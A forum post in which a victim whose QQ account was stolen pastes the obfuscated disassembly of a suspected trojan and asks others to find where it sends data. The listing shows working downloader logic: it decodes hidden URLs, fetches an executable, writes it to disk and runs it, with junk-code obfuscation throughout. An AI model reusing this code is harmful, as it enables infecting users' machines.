这个病毒没有加密。我用OLLYDBG打开看了一下,看不出明确的地址。
但从瑞星的报警来看,是偷密码的。
昨天已经把我的QQ偷了,把QQ号昵称改成了骂人的话,如果不是密码保护,我这QQ早已不保。
--源码如下,谁分析一下这个家伙把我密码发到哪个邮箱或主页了?
L000:
push ebp
mov ebp, esp
sub esp, 5F0
push ebx
push esi
push edi
mov dword ptr [ebp-3C], 00403130
mov dword ptr [ebp-38], 00403160
mov dword ptr [ebp-34], 00403190
mov dword ptr [ebp-30], 004031C0
mov dword ptr [ebp-1C], 004031FA
mov dword ptr [ebp-18], 00403203
mov dword ptr [ebp-14], 00403227
mov dword ptr [ebp-10], 0040322F
mov dword ptr [ebp-C], 00403235
mov dword ptr [ebp-8], 0040323D
mov dword ptr [ebp-4], 004031F0
mov dword ptr [ebp-44], 0
push eax
push ebx
push ecx
push edx
mov eax, E0FF0000
mov ebx, 10FFEEEE
sub eax, ebx
inc eax
inc ecx
inc edx
pop edx
pop ecx
pop ebx
pop eax
push 00403247
call L654
add esp, 4
push 00403247
lea ecx, dword ptr [ebp-158]
call L698
mov dword ptr [ebp-40], 0
jmp L043
L040:
mov eax, dword ptr [ebp-40]
add eax, 1
mov dword ptr [ebp-40], eax
L043:
cmp dword ptr [ebp-40], 4
jnb L051
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ebp+ecx*4-3C]
push edx
call L654
add esp, 4
jmp L040
L051:
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-5D0], eax
mov dword ptr [ebp-5CC], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
mov dword ptr [ebp-40], 0
jmp L076
L073:
mov eax, dword ptr [ebp-40]
add eax, 1
mov dword ptr [ebp-40], eax
L076:
cmp dword ptr [ebp-40], 7
jnb L084
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ebp+ecx*4-1C]
push edx
call L654
add esp, 4
jmp L073
L084:
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
call L391
test eax, eax
jnz L098
mov eax, dword ptr [ebp-44]
mov dword ptr [ebp-5D4], eax
lea ecx, dword ptr [ebp-158]
call L763
mov eax, dword ptr [ebp-5D4]
jmp L385
L098:
js L102
jns L102
sbb byte ptr [ebx], al
adc dh, byte ptr [ebx]
L102:
mov dword ptr [ebp-2C], 0
xor ecx, ecx
mov dword ptr [ebp-28], ecx
mov dword ptr [ebp-24], ecx
mov dword ptr [ebp-20], ecx
mov dword ptr [ebp-48], 0
L108:
mov edx, dword ptr [ebp-48]
mov eax, dword ptr [ebp-48]
add eax, 1
mov dword ptr [ebp-48], eax
cmp edx, 4
jge L273
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-5DC], eax
mov dword ptr [ebp-5D8], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
push 0
call time
add esp, 4
push eax
call srand
add esp, 4
call rand
and eax, 80000003
jns L146
dec eax
or eax, FFFFFFFC
inc eax
L146:
mov dword ptr [ebp-264], eax
mov dword ptr [ebp-260], 0
L148:
mov ecx, dword ptr [ebp-260]
mov edx, dword ptr [ebp-260]
add edx, 1
mov dword ptr [ebp-260], edx
cmp ecx, 4
jge L170
mov eax, dword ptr [ebp-264]
cmp dword ptr [ebp+eax*4-2C], 0
je L166
mov ecx, dword ptr [ebp-264]
add ecx, 1
and ecx, 80000003
jns L164
dec ecx
or ecx, FFFFFFFC
inc ecx
L164:
mov dword ptr [ebp-264], ecx
jmp L169
L166:
mov edx, dword ptr [ebp-264]
mov dword ptr [ebp+edx*4-2C], 1
jmp L170
L169:
jmp L148
L170:
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-5E4], eax
mov dword ptr [ebp-5E0], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
mov ax, word ptr [403118]
mov word ptr [ebp-25C], ax
mov cl, byte ptr [40311A]
mov byte ptr [ebp-25A], cl
mov ecx, 40
xor eax, eax
lea edi, dword ptr [ebp-259]
rep stos dword ptr es:[edi]
stos byte ptr es:[edi]
mov edi, 004031F0
lea edx, dword ptr [ebp-25C]
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
add edi, -1
mov ecx, ebx
shr ecx, 2
rep movs dword ptr es:[edi], dword ptr [esi]
mov ecx, ebx
and ecx, 3
rep movs byte ptr es:[edi], byte ptr [esi]
mov edi, 00403118
lea edx, dword ptr [ebp-25C]
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
add edi, -1
mov ecx, ebx
shr ecx, 2
rep movs dword ptr es:[edi], dword ptr [esi]
mov ecx, ebx
and ecx, 3
rep movs byte ptr es:[edi], byte ptr [esi]
mov byte ptr [ebp-368], 0
mov ecx, 40
xor eax, eax
lea edi, dword ptr [ebp-367]
rep stos dword ptr es:[edi]
stos word ptr es:[edi]
stos byte ptr es:[edi]
push 0A
lea eax, dword ptr [ebp-368]
push eax
push 0C389
call _itoa
add esp, 0C
lea ecx, dword ptr [ebp-368]
push ecx
mov edx, dword ptr [ebp-264]
mov eax, dword ptr [ebp+edx*4-3C]
push eax
lea ecx, dword ptr [ebp-25C]
push ecx
lea edx, dword ptr [ebp-570]
push edx
call sprintf
add esp, 10
push 0
lea eax, dword ptr [ebp-570]
push eax
lea ecx, dword ptr [ebp-158]
call L1268
mov dword ptr [ebp-44], eax
cmp dword ptr [ebp-44], 0
je L272
jmp L273
L272:
jmp L108
L273:
push ecx
inc ecx
pop ecx
cmp dword ptr [ebp-44], 0
je L380
jb L286
jnb L286
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L286:
lea ecx, dword ptr [ebp-158]
mov dword ptr [ebp-584], ecx
push ecx
push edx
inc ebx
inc ecx
mov edx, E0FF1086
mov ecx, 10EFC012
sub edx, ecx
inc ebx
inc ecx
pop edx
pop ecx
mov ecx, 11
xor eax, eax
lea edi, dword ptr [ebp-5C8]
rep stos dword ptr es:[edi]
mov dword ptr [ebp-5C8], 44
xor edx, edx
mov dword ptr [ebp-580], edx
mov dword ptr [ebp-57C], edx
mov dword ptr [ebp-578], edx
mov dword ptr [ebp-574], edx
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
lea eax, dword ptr [ebp-580]
push eax
lea ecx, dword ptr [ebp-5C8]
push ecx
push 0
push 0
push 0
push 0
push 0
push 0
mov edx, dword ptr [ebp-584]
push edx
push 0
call CreateProcessA
test eax, eax
jnz L346
jmp L380
L346:
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-5EC], eax
mov dword ptr [ebp-5E8], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
mov dword ptr [ebp-44], 1
mov eax, dword ptr [ebp-580]
push eax
call CloseHandle
mov ecx, dword ptr [ebp-57C]
push ecx
call CloseHandle
je L380
jnz L380
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L380:
mov edx, dword ptr [ebp-44]
mov dword ptr [ebp-5F0], edx
lea ecx, dword ptr [ebp-158]
call L763
mov eax, dword ptr [ebp-5F0]
L385:
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10
L391:
push ebp
mov ebp, esp
push -1
push 004020C0
push <jmp.&MSVCRT._except_handler3>
mov eax, dword ptr fs:[0]
push eax
mov dword ptr fs:[0], esp
add esp, -124
push ebx
push esi
push edi
mov dword ptr [ebp-28], 0
mov byte ptr [ebp-12C], 0
mov ecx, 3F
xor eax, eax
lea edi, dword ptr [ebp-12B]
rep stos dword ptr es:[edi]
stos word ptr es:[edi]
stos byte ptr es:[edi]
push 0A
lea eax, dword ptr [ebp-12C]
push eax
push 0C389
call _itoa
add esp, 0C
lea edi, dword ptr [ebp-12C]
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
not ecx
add ecx, -1
mov dword ptr [ebp-24], ecx
push ecx
inc ecx
pop ecx
lea ecx, dword ptr [ebp-2C]
push ecx
push 004031FA
push 80000002
call RegOpenKeyA
test eax, eax
je L436
mov eax, dword ptr [ebp-28]
jmp L632
L436:
wait
mov dword ptr [ebp-4], 0
push ecx
push edx
inc ebx
inc ecx
mov edx, E0FF1086
mov ecx, 10EFC012
sub edx, ecx
inc ebx
inc ecx
pop edx
pop ecx
lea edx, dword ptr [ebp-1C]
push edx
push 00403203
mov eax, dword ptr [ebp-2C]
push eax
call RegCreateKeyA
test eax, eax
je L458
jmp L572
L458:
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
mov ecx, dword ptr [ebp-24]
push ecx
lea edx, dword ptr [ebp-12C]
push edx
push 1
push 0
push 00403227
mov eax, dword ptr [ebp-1C]
push eax
call RegSetValueExA
test eax, eax
je L491
jmp L572
L491:
jb L499
jnb L499
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L499:
lea ecx, dword ptr [ebp-20]
push ecx
push 0040322F
mov edx, dword ptr [ebp-1C]
push edx
call RegCreateKeyA
test eax, eax
je L508
jmp L572
L508:
mov eax, dword ptr [ebp-20]
push eax
call RegCloseKey
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
lea ecx, dword ptr [ebp-20]
push ecx
push 00403235
db 8B
push ebp
in al, 52
call RegCreateKeyA
test eax, eax
je L541
jmp L572
L541:
push ecx
push edx
inc ebx
inc ecx
mov edx, E0FF1086
mov ecx, 10EFC012
sub edx, ecx
inc ebx
inc ecx
pop edx
pop ecx
mov eax, dword ptr [ebp-20]
push eax
call RegCloseKey
je L562
jnz L562
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L562:
lea ecx, dword ptr [ebp-20]
push ecx
push 0040323D
mov edx, dword ptr [ebp-1C]
push edx
call RegCreateKeyA
test eax, eax
je L571
jmp L572
L571:
mov dword ptr [ebp-28], 1
L572:
wait
mov dword ptr [ebp-4], -1
call L576
jmp L631
L576:
push eax
push ebx
push ecx
push edx
mov eax, E0FF0000
mov ebx, 10FFEEEE
sub eax, ebx
inc eax
inc ecx
inc edx
pop edx
pop ecx
pop ebx
pop eax
cmp dword ptr [ebp-2C], 0
je L595
mov eax, dword ptr [ebp-2C]
push eax
call RegCloseKey
L595:
cmp dword ptr [ebp-1C], 0
je L600
mov ecx, dword ptr [ebp-1C]
push ecx
call RegCloseKey
L600:
push 0040311C
call atoi
add esp, 4
push 0
push 0
call ceil
fstp st
add esp, 8
push 1
push 1
call div
add esp, 8
mov dword ptr [ebp-134], eax
mov dword ptr [ebp-130], edx
push 1
call isalnum
add esp, 4
push 1
call isalpha
add esp, 4
cmp dword ptr [ebp-20], 0
je L625
mov edx, dword ptr [ebp-20]
push edx
call RegCloseKey
L625:
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
retn
L631:
mov eax, dword ptr [ebp-28]
L632:
mov ecx, dword ptr [ebp-10]
mov dword ptr fs:[0], ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
L654:
push ebp
mov ebp, esp
push ebx
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
mov ecx, dword ptr [ebp+8]
mov al, byte ptr [ecx]
test al, al
je L687
L681:
add al, 5
mov byte ptr [ecx], al
mov al, byte ptr [ecx+1]
inc ecx
test al, al
jnz L681
L687:
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
mov eax, 1
pop ebx
pop ebp
retn
nop
nop
L698:
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov dword ptr [ebp-4], ecx
mov eax, dword ptr [ebp-4]
mov dword ptr [eax+108], 0
mov ecx, dword ptr [ebp-4]
mov dword ptr [ecx+10C], 0
js L713
jns L713
sbb byte ptr [ebx], al
adc dh, byte ptr [ebx]
L713:
push 1
push 2D
mov edx, dword ptr [ebp-4]
push edx
push 0
call SHGetSpecialFolderPathA
mov edi, dword ptr [ebp+8]
mov edx, dword ptr [ebp-4]
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, FFFFFFFF
xor eax, eax
repne scas byte ptr es:[edi]
add edi, -1
mov ecx, ebx
shr ecx, 2
rep movs dword ptr es:[edi], dword ptr [esi]
mov ecx, ebx
and ecx, 3
rep movs byte ptr es:[edi], byte ptr [esi]
push ecx
inc ecx
pop ecx
mov eax, dword ptr [ebp-4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
L763:
push esi
mov esi, ecx
push edi
mov InternetCloseHandle
mov eax, dword ptr [esi+108]
test eax, eax
je L772
push eax
call edi
L772:
mov esi, dword ptr [esi+10C]
test esi, esi
je L777
push esi
call edi
L777:
pop edi
pop esi
retn
nop
nop
nop
nop
nop
nop
nop
nop
nop
L789:
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
mov dword ptr [ebp-8], ecx
je L803
jnz L803
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L803:
cmp dword ptr [ebp+8], 0
je L807
mov dword ptr [ebp-4], 3
jmp L808
L807:
mov dword ptr [ebp-4], 0
L808:
push 0
push 0
mov eax, dword ptr [ebp+8]
push eax
mov ecx, dword ptr [ebp-4]
push ecx
push 00403120
call InternetOpenA
mov edx, dword ptr [ebp-8]
mov dword ptr [edx+108], eax
mov eax, dword ptr [ebp-8]
cmp dword ptr [eax+108], 0
jnz L823
xor eax, eax
jmp L832
L823:
jb L831
jnb L831
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L831:
mov eax, 1
L832:
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
L848:
push ebp
mov ebp, esp
sub esp, 404
push ebx
mov edx, ecx
push edi
mov ecx, 100
xor eax, eax
lea edi, dword ptr [ebp-404]
mov dword ptr [ebp-4], 400
rep stos dword ptr es:[edi]
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
mov edx, dword ptr [edx+10C]
push eax
lea eax, dword ptr [ebp-4]
lea ecx, dword ptr [ebp-404]
push eax
push ecx
push 5
push edx
call HttpQueryInfoA
test eax, eax
jnz L880
pop edi
pop ebx
mov esp, ebp
pop ebp
retn
L880:
push ecx
inc ecx
pop ecx
lea eax, dword ptr [ebp-404]
push eax
call atol
add esp, 4
pop edi
pop ebx
mov esp, ebp
pop ebp
retn
nop
nop
nop
nop
nop
nop
L898:
push ebp
mov ebp, esp
push -1
push 004020D0
push <jmp.&MSVCRT._except_handler3>
mov eax, dword ptr fs:[0]
push eax
mov dword ptr fs:[0], esp
add esp, -30
push ebx
push esi
push edi
mov dword ptr [ebp-40], ecx
mov dword ptr [ebp-20], 0
mov dword ptr [ebp-1C], 0
mov dword ptr [ebp-2C], 0
push eax
push ebx
push ecx
push edx
mov eax, 1
mov ebx, 2
mov ecx, 3
mov edx, 4
inc eax
inc ebx
inc ecx
inc edx
dec eax
dec ebx
dec ecx
dec edx
pop edx
pop ecx
pop ebx
pop eax
mov dword ptr [ebp-4], 0
jb L943
jnb L943
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L943:
push 0
push 80000000
push 0
push 0
mov eax, dword ptr [ebp+8]
push eax
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ecx+108]
push edx
call InternetOpenUrlA
mov ecx, dword ptr [ebp-40]
mov dword ptr [ecx+10C], eax
mov edx, dword ptr [ebp-40]
cmp dword ptr [edx+10C], 0
jnz L959
jmp L1082
L959:
je L966
jnz L966
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L966:
mov ecx, dword ptr [ebp-40]
call L848
mov dword ptr [ebp-28], eax
cmp dword ptr [ebp-28], 0
jnz L972
jmp L1082
L972:
push ecx
push edx
inc ebx
inc ecx
mov edx, E0FF1086
mov ecx, 10EFC012
sub edx, ecx
inc ebx
inc ecx
pop edx
pop ecx
mov eax, dword ptr [ebp-28]
push eax
call L1322
add esp, 4
mov dword ptr [ebp-34], eax
mov ecx, dword ptr [ebp+C]
mov edx, dword ptr [ebp-34]
mov dword ptr [ecx], edx
mov eax, dword ptr [ebp+C]
cmp dword ptr [eax], 0
jnz L995
jmp L1082
L995:
mov ecx, dword ptr [ebp-28]
xor eax, eax
mov edx, dword ptr [ebp+C]
mov edi, dword ptr [edx]
mov edx, ecx
shr ecx, 2
rep stos dword ptr es:[edi]
mov ecx, edx
and ecx, 3
rep stos byte ptr es:[edi]
mov eax, dword ptr [ebp+C]
mov ecx, dword ptr [eax]
mov dword ptr [ebp-2C], ecx
push ecx
inc ecx
pop ecx
L1011:
mov edx, dword ptr [ebp-1C]
cmp edx, dword ptr [ebp-28]
jnb L1078
js L1018
jns L1018
sbb byte ptr [ebx], al
adc dh, byte ptr [ebx]
L1018:
push 0
push 0
lea eax, dword ptr [ebp-24]
push eax
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ecx+10C]
push edx
call InternetQueryDataAvailable
test eax, eax
jnz L1036
mov eax, dword ptr [ebp+C]
mov ecx, dword ptr [eax]
mov dword ptr [ebp-38], ecx
mov edx, dword ptr [ebp-38]
push edx
call L1321
add esp, 4
jmp L1082
L1036:
push eax
push ebx
push ecx
push edx
mov eax, E0FF0000
mov ebx, 10FFEEEE
sub eax, ebx
inc eax
inc ecx
inc edx
pop edx
pop ecx
pop ebx
pop eax
mov dword ptr [ebp-30], 0
lea eax, dword ptr [ebp-30]
push eax
mov ecx, dword ptr [ebp-24]
push ecx
mov edx, dword ptr [ebp-2C]
push edx
mov eax, dword ptr [ebp-40]
mov ecx, dword ptr [eax+10C]
push ecx
call InternetReadFile
test eax, eax
jnz L1071
mov edx, dword ptr [ebp+C]
mov eax, dword ptr [edx]
mov dword ptr [ebp-3C], eax
mov ecx, dword ptr [ebp-3C]
push ecx
call L1321
add esp, 4
jmp L1082
L1071:
mov edx, dword ptr [ebp-2C]
add edx, dword ptr [ebp-30]
mov dword ptr [ebp-2C], edx
mov eax, dword ptr [ebp-1C]
add eax, dword ptr [ebp-30]
mov dword ptr [ebp-1C], eax
jmp L1011
L1078:
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ebp-1C]
mov dword ptr [ecx+104], edx
mov dword ptr [ebp-20], 1
L1082:
mov dword ptr [ebp-4], -1
call L1085
jmp L1112
L1085:
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
mov eax, dword ptr [ebp-40]
cmp dword ptr [eax+108], 0
je L1097
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ecx+108]
push edx
call InternetCloseHandle
L1097:
mov eax, dword ptr [ebp-40]
cmp dword ptr [eax+10C], 0
je L1104
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ecx+10C]
push edx
call InternetCloseHandle
L1104:
je L1111
jnz L1111
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L1111:
retn
L1112:
mov eax, dword ptr [ebp-20]
mov ecx, dword ptr [ebp-10]
mov dword ptr fs:[0], ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
int3
int3
int3
int3
int3
int3
L1127:
push ebp
mov ebp, esp
push -1
push 004020E0
push <jmp.&MSVCRT._except_handler3>
mov eax, dword ptr fs:[0]
push eax
mov dword ptr fs:[0], esp
add esp, -18
push ebx
push esi
push edi
mov dword ptr [ebp-28], ecx
jb L1148
jnb L1148
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L1148:
push 0
push 80
push 2
push 0
push 1
push 40000000
mov eax, dword ptr [ebp-28]
push eax
call CreateFileA
mov dword ptr [ebp-20], eax
cmp dword ptr [ebp-20], -1
jnz L1162
xor eax, eax
jmp L1213
L1162:
mov dword ptr [ebp-1C], 0
wait
mov dword ptr [ebp-4], 0
push 0
lea ecx, dword ptr [ebp-24]
push ecx
mov edx, dword ptr [ebp-28]
mov eax, dword ptr [edx+104]
push eax
mov ecx, dword ptr [ebp+8]
push ecx
mov edx, dword ptr [ebp-20]
push edx
call WriteFile
test eax, eax
jnz L1179
jmp L1199
L1179:
push eax
push ebx
push ecx
push edx
mov eax, E0FF0000
mov ebx, 10FFEEEE
sub eax, ebx
inc eax
inc ecx
inc edx
pop edx
pop ecx
pop ebx
pop eax
mov eax, dword ptr [ebp-28]
mov ecx, dword ptr [eax+104]
cmp ecx, dword ptr [ebp-24]
je L1198
jmp L1199
L1198:
mov dword ptr [ebp-1C], 1
L1199:
wait
mov dword ptr [ebp-4], -1
call L1203
jmp L1207
L1203:
mov edx, dword ptr [ebp-20]
push edx
call CloseHandle
retn
L1207:
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
mov eax, dword ptr [ebp-1C]
L1213:
mov ecx, dword ptr [ebp-10]
mov dword ptr fs:[0], ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
L1221:
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
mov ecx, dword ptr [ebp+8]
lea eax, dword ptr [ebp-4]
push edi
push eax
xor edi, edi
push ecx
mov ecx, esi
mov dword ptr [ebp-4], edi
call L898
test eax, eax
jnz L1242
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
L1242:
push ecx
inc ecx
pop ecx
mov eax, dword ptr [ebp-4]
cmp word ptr [eax], 5A4D
jnz L1254
push eax
mov ecx, esi
call L1127
test eax, eax
je L1254
mov edi, 1
L1254:
mov edx, dword ptr [ebp-4]
push edx
call L1321
add esp, 4
mov eax, edi
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
nop
nop
nop
nop
L1268:
push ebp
mov ebp, esp
push esi
mov esi, ecx
push 0040311C
call atoi
push 0
push 0
call ceil
push 1
push 1
fstp st
call div
push 1
call isalnum
push 1
call isalpha
mov eax, dword ptr [ebp+C]
add esp, 1C
mov ecx, esi
push eax
call L789
test eax, eax
jnz L1295
pop esi
pop ebp
retn 8
L1295:
push ecx
inc ecx
pop ecx
mov ecx, dword ptr [ebp+8]
push ecx
mov ecx, esi
call L1221
pop esi
pop ebp
retn 8
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp _except_handler3
L1321:
jmp operator delete
L1322:
jmp operator new
push ebp
mov ebp, esp
push -1
push 004020F0
push <jmp.&MSVCRT._except_handler3>
mov eax, dword ptr fs:[0]
push eax
mov dword ptr fs:[0], esp
sub esp, 68
push ebx
push esi
push edi
mov dword ptr [ebp-18], esp
xor ebx, ebx
mov dword ptr [ebp-4], ebx
push 2
call __set_app_type
pop ecx
or dword ptr [403274], FFFFFFFF
or dword ptr [403278], FFFFFFFF
call __p__fmode
mov ecx, dword ptr [403270]
mov dword ptr [eax], ecx
call __p__commode
mov ecx, dword ptr [40326C]
mov dword ptr [eax], ecx
mov _adjust_fdiv
mov eax, dword ptr [eax]
mov dword ptr [40327C], eax
call L1452
cmp dword ptr [403260], ebx
jnz L1358
push 00401FDE
call __setusermatherr
pop ecx
L1358:
call L1444
push 0040300C
push 00403008
call L1443
mov eax, dword ptr [403268]
mov dword ptr [ebp-6C], eax
lea eax, dword ptr [ebp-6C]
push eax
push dword ptr [403264]
lea eax, dword ptr [ebp-64]
push eax
lea eax, dword ptr [ebp-70]
push eax
lea eax, dword ptr [ebp-60]
push eax
call __getmainargs
push 00403004
push 00403000
call L1443
add esp, 24
mov _acmdln
mov esi, dword ptr [eax]
mov dword ptr [ebp-74], esi
cmp byte ptr [esi], 22
jnz L1407
L1383:
inc esi
mov dword ptr [ebp-74], esi
mov al, byte ptr [esi]
cmp al, bl
je L1390
cmp al, 22
jnz L1383
L1390:
cmp byte ptr [esi], 22
jnz L1394
L1392:
inc esi
mov dword ptr [ebp-74], esi
L1394:
mov al, byte ptr [esi]
cmp al, bl
je L1399
cmp al, 20
jbe L1392
L1399:
mov dword ptr [ebp-30], ebx
lea eax, dword ptr [ebp-5C]
push eax
call GetStartupInfoA
test byte ptr [ebp-30], 1
je L1412
movzx eax, word ptr [ebp-2C]
jmp L1414
L1407:
cmp byte ptr [esi], 20
jbe L1394
inc esi
mov dword ptr [ebp-74], esi
jmp L1407
L1412:
push 0A
pop eax
L1414:
push eax
push esi
push ebx
push ebx
call GetModuleHandleA
push eax
call L000
mov dword ptr [ebp-68], eax
push eax
call exit
mov eax, dword ptr [ebp-14]
mov ecx, dword ptr [eax]
mov ecx, dword ptr [ecx]
mov dword ptr [ebp-78], ecx
push eax
push ecx
call L1442
pop ecx
pop ecx
retn
db 8B
db 65
db E8
db FF
db 75
mov bh, bh
db 15
dd <&MSVCRT._exit>
L1442:
jmp _XcptFilter
L1443:
jmp _initterm
L1444:
push 30000
push 10000
call L1453
pop ecx
pop ecx
retn
xor eax, eax
retn
L1452:
retn
L1453:
jmp _controlfp
int3
int3
int3
int3
int3
int3
int3
int3
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课